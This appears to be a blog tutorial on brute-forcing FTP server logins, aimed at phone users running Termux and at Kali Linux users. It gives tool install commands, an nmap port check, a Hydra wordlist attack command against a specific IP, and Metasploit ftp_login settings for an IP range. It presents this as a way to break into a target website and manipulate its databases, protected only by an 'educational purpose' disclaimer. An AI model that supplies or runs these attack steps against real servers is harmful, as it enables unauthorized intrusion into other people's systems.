Hi…hackstars, In this post ‘m gonna take you through all the way to attack a ftp server and gain root access to manipulate databases. All these actions can be done both via smartphone or PC. So lets get started.
For Smartphone users :
- Install Termux via Playstore.Open Termux ,it will install all necessary packages(it take few seconds, time will depend on your connection speed).Now type these commands to download necessary packages.
apt-get update && apt-get upgrade
pkg install python
pkg install python2
pkg install git
pkg install dnsutils
pkg install nmap
Now we are ready to go…
Using Hydra :
For Smartphone users they just need to download Hydra which can be done by following command
pkg install hydra
For PC linux users(especially Kali Linux) Hydra is pre-installed.
Now both Smartphone users or linux PC users just type the commands as shown :
- First you have to find out the IP address of website onto which you want to attack. For this you can try dnslookup or any online tools like iplookup or reverse dns.
2. Now it’s time to check whether FTP port is up or not. For this use nmap.
3. It will give its output, check if ftp port(port 21) is open or up.
Here as you can see Port 21 or ftp port is open,so we can further process the attack.
4. Choose a username and password list for BruteForcing the ftp admin panel. For Kali linux users many password lists are available in
Smartphone users can download username list and password list from any website they want or even they can create a .txt file and write password in it line by line.
Same procedure is for username too.
5. Now the final step is to launch the attack via Hydra
Syntax for Hydra is >
hydra -d -L /username-list path -P /password-list path ftp : ip_address
As in my case username list file is username.txt & password list file is password.txt and both are stored in downloads folder of my phone.
So, here’s the command in my case
hydra -d -L /storage/emulated/0/username.txt -P /storage/emulated/0/password.txt ftp://18.104.22.168
Here -d will show you each password attempt ,you can also ignore it. Its optional.
Also if you want to use only one username you can use -l (small L) in place of -L and then in place of username_file path just write that username that you want. Same in case of password if you want to use only one password just replace -P with -p.
Now you are all done, if any password matches it will show you the result.
Using Metasploit :
- For Smartphone users they just need to download Metasploit-Framework which can be done by following command
pkg install unstable-repo
pkg Install metasploit
- For PC linux users(especially Kali Linux) Metasploit is pre-installed.
Now we can get started,
1. First launch Metasploit-Framework by typing following command
2. Now write following commands
msf auxiliary(ftp_login) > set RHOSTS 192.168.69.50-254
msf auxiliary(ftp_login) > set THREADS 205
msf auxiliary(ftp_login) > set USERNAME username-list
msf auxiliary(ftp_login) > set PASSWORD password-list
If you want to use username-list or password-list you can simply write the path at suitable positions.
Now just be patient and let it crack the admin panel.
Once it gets the correct id and password it will show you.
So, this is how you gonna hack ftp server using either Hydra or Metasploit-Framework.
Note – This is only for educational purpose and I’m not responsible for any misuse or harm done.
If you need any help then feel free to ask me in comment.